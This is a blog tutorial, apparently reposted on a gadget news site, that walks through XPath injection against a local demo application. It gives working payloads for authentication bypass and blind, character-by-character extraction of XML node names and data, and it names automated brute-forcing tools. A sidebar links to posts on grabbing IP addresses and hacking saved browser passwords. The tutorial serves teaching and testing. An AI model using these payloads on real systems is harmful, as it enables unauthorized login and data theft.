Gadget News

we provide information about gadget news and price information and specs samsung, huawei, Tecno Price products, Specifications, Features and more information about software from blackberry and android

Home » Hacking » Website Hacking » XPATH INJECTION TUTORIAL 2016
Saturday, June 18, 2016

XPATH INJECTION TUTORIAL 2016

By Anonymous at
XPATH INJECTION TUTORIAL 2016 - Did you know that every day there is always a new technology that is created? if you want to know please refer to the blog Gadget News well now we will discuss first about XPATH INJECTION TUTORIAL 2016 as you need now, we have compiled this article carefully, so please see to finish.

Articles : XPATH INJECTION TUTORIAL 2016
full Link : XPATH INJECTION TUTORIAL 2016
Article Hacking, Article Website Hacking,

You can also see our article on:


XPATH INJECTION TUTORIAL 2016

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.
XPATH INJECTION TUTORIAL 2016
XPATH INJECTION TUTORIAL 2016


We are gonna learn using the simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<Employees> 
<!-- Employees Database --> 
  <Employee ID="1"> 
    <FirstName>Johnny</FirstName> 
    <LastName>Bravo</LastName> 
    <UserName>jbravo</UserName> 
    <Password>test123</Password> 
    <Type>Admin</Type> 
  </Employee> 
  <Employee ID="2"> 
    <FirstName>Mark</FirstName> 
    <LastName>Brown</LastName> 
    <UserName>mbrown</UserName> 
    <Password>demopass</Password> 
    <Type>User</Type> 
  </Employee> 
  <Employee ID="3"> 
    <FirstName>William</FirstName> 
    <LastName>Gates</LastName> 
    <UserName>wgates</UserName> 
    <Password>MSRocks!</Password> 
    <Type>User</Type> 
  </Employee> 
  <Employee ID="4"> 
    <FirstName>Chris</FirstName> 
    <LastName>Dawes</LastName> 
    <UserName>cdawes</UserName> 
    <Password>letmein</Password> 
    <Type>User</Type> 
  </Employee> 
</Employees> 

Bypass Authentication:-


Browse to the login.php page; here we can see the simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection
Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.


Blind XPath Injection:-


If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.

Blind XPATH Injection
Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).

Blind XPATH Injection
In blind XPath injection, we have to provide the specially crafted query to the application, if the query is true we will get result otherwise, we will not get any result.Till now We don`t know about any parent or child node of an XML document.

Guessing Of Parent Node:-


Supply the following query to application & observe the result.

' or substring(name(parent::*[position()=1]),1,1)='a

Nothing append , we don`t get FirstName of users.It means the first letter of the parent node is not "a". Now supply the following query

' or substring(name(parent::*[position()=1]),1,1)='E

Blind XPATH Injection
You get result , It means the first letter of parent node is "E"

To guess the second letter of parent node supply the following query

' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'.

We can also get child node. Browse to the xpath.php page & enter the following query.

//Employee[position()=3]/child::node()[position()=4]/text()

get-child-node
You got output from parent node Employee id 3 & child node whose position is 2.

To get the whole document put following query.

//Employee

Blind Xpath injection
It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:

  • count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
  •  string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.
I used recon-ng xpath brute forcer for XPath injection attack & we will get back end XML file.
xapth-bruteforcer

Useful Links & Blind XPATH injection Tools:-

https://www.owasp.org/index.php/XPATH_Injection

https://www.owasp.org/index.php/Blind_XPath_Injection

XPATH BLIND EXPLORER:-  http://code.google.com/p/xpath-blind-explorer/downloads/list

XCAT:-  https://github.com/orf/xcat



article XPATH INJECTION TUTORIAL 2016 has been completed in the discussion

hopefully the information XPATH INJECTION TUTORIAL 2016 that we provide can be useful for you to know the development of technology in the present

articles XPATH INJECTION TUTORIAL 2016 we have conveyed to you, if feel this information is useful and you want to bookmark or share so that more people who know please use link https://profsmythe.blogspot.com/2016/06/xpath-injection-tutorial-2016.html.

Tag : , ,
Share on Facebook
Share on Twitter
Share on Google+

Related : XPATH INJECTION TUTORIAL 2016

  • How To Grab Someone IP Address ? In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by ...
  • Password Protect Any Folder Without Any SoftwareIn my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using ...
  • How To Hack Saved Password In Firefox ?In my previous post i had posted two tutorials on How to hack google chrome saved password ? and More simple way to hack google chrome saved passworod. In this post ...
  • Hacking Windows XpGet ready for some down-and-dirty hackin'! Over 200 serious hacks readers can use to force Windows XP to do it their way, written in the ExtremeTech no-holds-barred styl ...
  • Computer Hacking in the New Age, All you Need to Know about Hacking TodayEvery human discovery has pros and cons, so is the computer which has pervaded all our lives. The modern humanity is increasingly dependent on computer for various day-t ...

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)